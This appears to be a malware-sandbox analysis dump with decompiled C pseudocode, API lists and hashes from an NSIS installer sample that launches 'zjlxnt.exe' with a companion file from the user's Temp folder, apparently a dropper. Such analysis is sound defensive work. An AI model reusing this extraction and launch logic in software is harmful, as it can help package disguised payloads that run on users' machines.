                                                          								 *0x429224 = _t87;
                                                          								RegisterClassW(0x429200);
                                                          							}
                                                          							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                          							E00403C67(E0040140B(5), 1);
                                                          							return _t44;
                                                          						}
                                                          						L22:
                                                          						_t36 = 2;
                                                          						return _t36;
                                                          					} else {
                                                          						_t78 =  *0x42a260;
                                                          						 *0x429204 = E00401000;
                                                          						 *0x429210 =  *0x42a260;
                                                          						 *0x429214 = _t30;
                                                          						 *0x429224 = 0x40a3b4;
                                                          						if(RegisterClassW(0x429200) == 0) {
                                                          							L33:
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                          						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                          						goto L21;
                                                          					}
                                                          				} else {
                                                          					_t78 =  *(_t82 + 0x48);
                                                          					_t92 = _t78;
                                                          					if(_t78 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					_t76 = 0x428200;
                                                          					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                          					_t63 =  *0x428200; // 0x22
                                                          					if(_t63 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					if(_t63 == 0x22) {
                                                          						_t76 = 0x428202;
                                                          						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                          					}
                                                          					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                          					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                          						L15:
                                                          						E00406668(0x435800, E00405F37(_t76));
                                                          						goto L16;
                                                          					} else {
                                                          						_t69 = GetFileAttributesW(_t76);
                                                          						if(_t69 == 0xffffffff) {
                                                          							L14:
                                                          							E00405F83(_t76);
                                                          							goto L15;
                                                          						}
                                                          						_t98 = _t69 & 0x00000010;
                                                          						if((_t69 & 0x00000010) != 0) {
                                                          							goto L15;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}
























                                                          0x00403d1d
                                                          0x00403d26
                                                          0x00403d2d
                                                          0x00403d2f
                                                          0x00403d43
                                                          0x00403d55
                                                          0x00403d5e
                                                          0x00403d67
                                                          0x00403d6e
                                                          0x00403d73
                                                          0x00403d7a
                                                          0x00403d8d
                                                          0x00403d8d
                                                          0x00403d98
                                                          0x00403d31
                                                          0x00403d3c
                                                          0x00403d3c
                                                          0x00403d9d
                                                          0x00403db0
                                                          0x00403db5
                                                          0x00403dc6
                                                          0x00403e58
                                                          0x00403e60
                                                          0x00403e69
                                                          0x00403e69
                                                          0x00403e7f
                                                          0x00403e85
                                                          0x00403e93
                                                          0x00403f14
                                                          0x00403f1c
                                                          0x00403f26
                                                          0x00403f2b
                                                          0x00403f31
                                                          0x00403fbb
                                                          0x00403fc0
                                                          0x00403fc2
                                                          0x00403fde
                                                          0x00000000
                                                          0x00403fde
                                                          0x00403fc4
                                                          0x00403fca
                                                          0x00403fd2
                                                          0x00403fd2
                                                          0x00000000
                                                          0x00403fca
                                                          0x00403f3f
                                                          0x00403f4a
                                                          0x00403f4f
                                                          0x00403f51
                                                          0x00403f58
                                                          0x00403f58
                                                          0x00403f63
                                                          0x00403f6b
                                                          0x00403f6d
                                                          0x00403f6f
                                                          0x00403f78
                                                          0x00403f7b
                                                          0x00403f81
                                                          0x00403f81
                                                          0x00403fa0
                                                          0x00403fb1
                                                          0x00000000
                                                          0x00403fb6
                                                          0x00403f1e
                                                          0x00403f20
                                                          0x00000000
                                                          0x00403e95
                                                          0x00403e95
                                                          0x00403ea1
                                                          0x00403eab
                                                          0x00403eb1
                                                          0x00403eb6
                                                          0x00403ec5
                                                          0x00403fe3
                                                          0x00403fe3
                                                          0x00000000
                                                          0x00403fe3
                                                          0x00403ed4
                                                          0x00403f0f
                                                          0x00000000
                                                          0x00403f0f
                                                          0x00403dcc
                                                          0x00403dcc
                                                          0x00403dcf
                                                          0x00403dd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ddf
                                                          0x00403df1
                                                          0x00403df6
                                                          0x00403dff
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e05
                                                          0x00403e07
                                                          0x00403e14
                                                          0x00403e14
                                                          0x00403e1d
                                                          0x00403e23
                                                          0x00403e4b
                                                          0x00403e53
                                                          0x00000000
                                                          0x00403e35
                                                          0x00403e36
                                                          0x00403e3f
                                                          0x00403e45
                                                          0x00403e46
                                                          0x00000000
                                                          0x00403e46
                                                          0x00403e41
                                                          0x00403e43
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e43
                                                          0x00403e23

                                                          APIs
                                                            • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                            • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                          • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                          • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,?,?,?,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,766DFAA0), ref: 00403E18
                                                          • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,?,?,?,"C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                          • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,?,00000000,?), ref: 00403E36
                                                          • LoadImageW.USER32 ref: 00403E7F
                                                            • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                          • RegisterClassW.USER32 ref: 00403EBC
                                                          • SystemParametersInfoW.USER32 ref: 00403ED4
                                                          • CreateWindowExW.USER32 ref: 00403F09
                                                          • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                          • GetClassInfoW.USER32 ref: 00403F6B
                                                          • GetClassInfoW.USER32 ref: 00403F78
                                                          • RegisterClassW.USER32 ref: 00403F81
                                                          • DialogBoxParamW.USER32 ref: 00403FA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-2403558497
                                                          • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                          • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                          • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                          • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                          C-Code - Quality: 98%
                                                          			E004030D0(void* __eflags, signed int _a4) {
                                                          				DWORD* _v8;
                                                          				DWORD* _v12;
                                                          				intOrPtr _v16;
                                                          				long _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				signed int _v40;
                                                          				short _v560;
                                                          				long _t54;
                                                          				void* _t57;
                                                          				void* _t62;
                                                          				intOrPtr _t65;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				long _t82;
                                                          				signed int _t89;
                                                          				intOrPtr _t92;
                                                          				long _t94;
                                                          				void* _t102;
                                                          				void* _t106;
                                                          				long _t107;
                                                          				long _t110;
                                                          				void* _t111;
                                                          
                                                          				_t94 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				 *0x42a26c = GetTickCount() + 0x3e8;
                                                          				GetModuleFileNameW(0, L"C:\\Users\\alfons\\Desktop\\file.exe", 0x400);
                                                          				_t106 = E00406158(L"C:\\Users\\alfons\\Desktop\\file.exe", 0x80000000, 3);
                                                          				 *0x40a018 = _t106;
                                                          				if(_t106 == 0xffffffff) {
                                                          					return L"Error launching installer";
                                                          				}
                                                          				E00406668(0x436800, L"C:\\Users\\alfons\\Desktop\\file.exe");
                                                          				E00406668(0x439000, E00405F83(0x436800));
                                                          				_t54 = GetFileSize(_t106, 0);
                                                          				 *0x420f00 = _t54;
                                                          				_t110 = _t54;
                                                          				if(_t54 <= 0) {
                                                          					L24:
                                                          					E0040302E(1);
                                                          					if( *0x42a274 == _t94) {
                                                          						goto L32;
                                                          					}
                                                          					if(_v12 == _t94) {
                                                          						L28:
                                                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                          						_t111 = _t57;
                                                          						E00406B90(0x40ce68);
                                                          						E00406187(0x40ce68,  &_v560, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
                                                          						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                          						 *0x40a01c = _t62;
                                                          						if(_t62 != 0xffffffff) {
                                                          							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                          							 *0x420f04 = _t65;
                                                          							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                          							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                          							if(_t68 == _v20) {
                                                          								 *0x42a270 = _t111;
                                                          								 *0x42a278 =  *_t111;
                                                          								if((_v40 & 0x00000001) != 0) {
                                                          									 *0x42a27c =  *0x42a27c + 1;
                                                          								}
                                                          								_t45 = _t111 + 0x44; // 0x44
                                                          								_t70 = _t45;
                                                          								_t102 = 8;
                                                          								do {
                                                          									_t70 = _t70 - 8;
                                                          									 *_t70 =  *_t70 + _t111;
                                                          									_t102 = _t102 - 1;
                                                          								} while (_t102 != 0);
                                                          								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                                          								E00406113(0x42a280, _t111 + 4, 0x40);
                                                          								return 0;
                                                          							}
                                                          							goto L32;
                                                          						}
                                                          						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                          					}
                                                          					E004035F8( *0x420ef0);
                                                          					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                                          						goto L32;
                                                          					} else {
                                                          						goto L28;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t107 = _t110;
                                                          						asm("sbb eax, eax");
                                                          						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                          						if(_t110 >= _t82) {
                                                          							_t107 = _t82;
                                                          						}
                                                          						if(E004035E2(0x418ef0, _t107) == 0) {
                                                          							E0040302E(1);
                                                          							L32:
                                                          							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                          						}
                                                          						if( *0x42a274 != 0) {
                                                          							if((_a4 & 0x00000002) == 0) {
                                                          								E0040302E(0);
                                                          							}
                                                          							goto L20;
                                                          						}
                                                          						E00406113( &_v40, 0x418ef0, 0x1c);
                                                          						_t89 = _v40;
                                                          						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                          							_a4 = _a4 | _t89;
                                                          							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                          							_t92 = _v16;
                                                          							 *0x42a274 =  *0x420ef0;
                                                          							if(_t92 > _t110) {
                                                          								goto L32;
                                                          							}
                                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                          								_v12 = _v12 + 1;
                                                          								_t110 = _t92 - 4;
                                                          								if(_t107 > _t110) {
                                                          									_t107 = _t110;
                                                          								}
                                                          								goto L20;
                                                          							} else {
                                                          								break;
                                                          							}
                                                          						}
                                                          						L20:
                                                          						if(_t110 <  *0x420f00) {
                                                          							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                          						}
                                                          						 *0x420ef0 =  *0x420ef0 + _t107;
                                                          						_t110 = _t110 - _t107;
                                                          					} while (_t110 != 0);
                                                          					_t94 = 0;
                                                          					goto L24;
                                                          				}
                                                          			}




























                                                          0x004030db
                                                          0x004030de
                                                          0x004030e1
                                                          0x004030fb
                                                          0x00403100
                                                          0x00403113
                                                          0x00403118
                                                          0x0040311e
                                                          0x00000000
                                                          0x00403120
                                                          0x00403131
                                                          0x00403142
                                                          0x00403149
                                                          0x00403151
                                                          0x00403156
                                                          0x00403158
                                                          0x00403243
                                                          0x00403245
                                                          0x00403251
                                                          0x00000000
                                                          0x00000000
                                                          0x0040325a
                                                          0x00403286
                                                          0x0040328b
                                                          0x00403296
                                                          0x00403298
                                                          0x004032a9
                                                          0x004032c4
                                                          0x004032cd
                                                          0x004032d2
                                                          0x004032f1
                                                          0x00403301
                                                          0x00403313
                                                          0x00403318
                                                          0x00403320
                                                          0x0040332d
                                                          0x00403335
                                                          0x0040333a
                                                          0x0040333c
                                                          0x0040333c
                                                          0x00403344
                                                          0x00403344
                                                          0x00403347
                                                          0x00403348
                                                          0x00403348
                                                          0x0040334b
                                                          0x0040334d
                                                          0x0040334d
                                                          0x00403357
                                                          0x00403363
                                                          0x00000000
                                                          0x00403368
                                                          0x00000000
                                                          0x00403320
                                                          0x00000000
                                                          0x004032d4
                                                          0x00403262
                                                          0x00403274
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040315e
                                                          0x00403163
                                                          0x00403168
                                                          0x0040316c
                                                          0x00403173
                                                          0x0040317a
                                                          0x0040317c
                                                          0x0040317c
                                                          0x00403187
                                                          0x004032e0
                                                          0x00403322
                                                          0x00000000
                                                          0x00403322
                                                          0x00403194
                                                          0x00403214
                                                          0x00403218
                                                          0x0040321d
                                                          0x00000000
                                                          0x00403214
                                                          0x0040319d
                                                          0x004031a2
                                                          0x004031aa
                                                          0x004031d0
                                                          0x004031df
                                                          0x004031e5
                                                          0x004031ea
                                                          0x004031f0
                                                          0x00000000
                                                          0x00000000
                                                          0x004031fa
                                                          0x00403202
                                                          0x00403205
                                                          0x0040320a
                                                          0x0040320c
                                                          0x0040320c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004031fa
                                                          0x0040321e
                                                          0x00403224
                                                          0x00403230
                                                          0x00403230
                                                          0x00403233
                                                          0x00403239
                                                          0x00403239
                                                          0x00403241
                                                          0x00000000
                                                          0x00403241

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004030E4
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000400), ref: 00403100
                                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040615C
                                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 00403149
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\file.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-3950381137
                                                          • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                          • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                          • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                          • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                          C-Code - Quality: 77%
                                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                          				void* __esi;
                                                          				void* _t35;
                                                          				void* _t43;
                                                          				void* _t45;
                                                          				FILETIME* _t51;
                                                          				FILETIME* _t64;
                                                          				void* _t66;
                                                          				signed int _t72;
                                                          				FILETIME* _t73;
                                                          				FILETIME* _t77;
                                                          				signed int _t79;
                                                          				WCHAR* _t81;
                                                          				void* _t83;
                                                          				void* _t84;
                                                          				void* _t86;
                                                          
                                                          				_t77 = __ebx;
                                                          				 *(_t86 - 8) = E00402DA6(0x31);
                                                          				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                          				_t35 = E00405FAE( *(_t86 - 8));
                                                          				_push( *(_t86 - 8));
                                                          				_t81 = L"\"C:\\";
                                                          				if(_t35 == 0) {
                                                          					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
                                                          				} else {
                                                          					E00406668();
                                                          				}
                                                          				E004068EF(_t81);
                                                          				while(1) {
                                                          					__eflags =  *(_t86 + 8) - 3;
                                                          					if( *(_t86 + 8) >= 3) {
                                                          						_t66 = E0040699E(_t81);
                                                          						_t79 = 0;
                                                          						__eflags = _t66 - _t77;
                                                          						if(_t66 != _t77) {
                                                          							_t73 = _t66 + 0x14;
                                                          							__eflags = _t73;
                                                          							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                          						__eflags = _t72;
                                                          						 *(_t86 + 8) = _t72;
                                                          					}
                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                          					if( *(_t86 + 8) == _t77) {
                                                          						E00406133(_t81);
                                                          					}
                                                          					__eflags =  *(_t86 + 8) - 1;
                                                          					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                          					__eflags = _t43 - 0xffffffff;
                                                          					 *(_t86 - 0x38) = _t43;
                                                          					if(_t43 != 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					__eflags =  *(_t86 + 8) - _t77;
                                                          					if( *(_t86 + 8) != _t77) {
                                                          						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                          						__eflags =  *(_t86 + 8) - 2;
                                                          						if(__eflags == 0) {
                                                          							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                          						}
                                                          						L31:
                                                          						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                          						__eflags =  *0x42a2e8;
                                                          						goto L32;
                                                          					} else {
                                                          						E00406668(0x40b5f8, _t83);
                                                          						E00406668(_t83, _t81);
                                                          						E004066A5(_t77, _t81, _t83, "C:\Users\alfons\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                          						E00406668(_t83, 0x40b5f8);
                                                          						_t64 = E00405CC8("C:\Users\alfons\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                          						__eflags = _t64;
                                                          						if(_t64 == 0) {
                                                          							continue;
                                                          						} else {
                                                          							__eflags = _t64 == 1;
                                                          							if(_t64 == 1) {
                                                          								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                          								L32:
                                                          								_t51 = 0;
                                                          								__eflags = 0;
                                                          							} else {
                                                          								_push(_t81);
                                                          								_push(0xfffffffa);
                                                          								E004056CA();
                                                          								L29:
                                                          								_t51 = 0x7fffffff;
                                                          							}
                                                          						}
                                                          					}
                                                          					L33:
                                                          					return _t51;
                                                          				}
                                                          				E004056CA(0xffffffea,  *(_t86 - 8));
                                                          				 *0x42a314 =  *0x42a314 + 1;
                                                          				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                          				 *0x42a314 =  *0x42a314 - 1;
                                                          				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                          				_t84 = _t45;
                                                          				if( *(_t86 - 0x24) != 0xffffffff) {
                                                          					L22:
                                                          					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                          				} else {
                                                          					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                          					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                          						goto L22;
                                                          					}
                                                          				}
                                                          				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                          				__eflags = _t84 - _t77;
                                                          				if(_t84 >= _t77) {
                                                          					goto L31;
                                                          				} else {
                                                          					__eflags = _t84 - 0xfffffffe;
                                                          					if(_t84 != 0xfffffffe) {
                                                          						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                          					} else {
                                                          						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                          						lstrcatW(_t81,  *(_t86 - 8));
                                                          					}
                                                          					_push(0x200010);
                                                          					_push(_t81);
                                                          					E00405CC8();
                                                          					goto L29;
                                                          				}
                                                          				goto L33;
                                                          			}


















                                                          0x0040176f
                                                          0x00401776
                                                          0x00401782
                                                          0x00401785
                                                          0x0040178a
                                                          0x0040178d
                                                          0x00401794
                                                          0x004017b0
                                                          0x00401796
                                                          0x00401797
                                                          0x00401797
                                                          0x004017b6
                                                          0x004017bb
                                                          0x004017bb
                                                          0x004017bf
                                                          0x004017c2
                                                          0x004017c7
                                                          0x004017c9
                                                          0x004017cb
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017db
                                                          0x004017db
                                                          0x004017ec
                                                          0x004017ee
                                                          0x004017ee
                                                          0x004017ef
                                                          0x004017ef
                                                          0x004017f2
                                                          0x004017f5
                                                          0x004017f8
                                                          0x004017f8
                                                          0x004017ff
                                                          0x0040180e
                                                          0x00401813
                                                          0x00401816
                                                          0x00401819
                                                          0x00000000
                                                          0x00000000
                                                          0x0040181b
                                                          0x0040181e
                                                          0x00401874
                                                          0x00401879
                                                          0x004015b6
                                                          0x0040292e
                                                          0x0040292e
                                                          0x00402c2a
                                                          0x00402c2d
                                                          0x00402c2d
                                                          0x00000000
                                                          0x00401820
                                                          0x00401826
                                                          0x0040182d
                                                          0x0040183a
                                                          0x00401845
                                                          0x0040185b
                                                          0x0040185b
                                                          0x0040185e
                                                          0x00000000
                                                          0x00401864
                                                          0x00401864
                                                          0x00401865
                                                          0x00401882
                                                          0x00402c33
                                                          0x00402c33
                                                          0x00402c33
                                                          0x00401867
                                                          0x00401867
                                                          0x00401868
                                                          0x00401493
                                                          0x0040239d
                                                          0x0040239d
                                                          0x0040239d
                                                          0x00401865
                                                          0x0040185e
                                                          0x00402c35
                                                          0x00402c39
                                                          0x00402c39
                                                          0x00401892
                                                          0x00401897
                                                          0x004018a5
                                                          0x004018aa
                                                          0x004018b0
                                                          0x004018b4
                                                          0x004018b6
                                                          0x004018be
                                                          0x004018ca
                                                          0x004018b8
                                                          0x004018b8
                                                          0x004018bc
                                                          0x00000000
                                                          0x00000000
                                                          0x004018bc
                                                          0x004018d3
                                                          0x004018d9
                                                          0x004018db
                                                          0x00000000
                                                          0x004018e1
                                                          0x004018e1
                                                          0x004018e4
                                                          0x004018fc
                                                          0x004018e6
                                                          0x004018e9
                                                          0x004018f2
                                                          0x004018f2
                                                          0x00401901
                                                          0x00401906
                                                          0x00402398
                                                          0x00000000
                                                          0x00402398
                                                          0x00000000

                                                          APIs
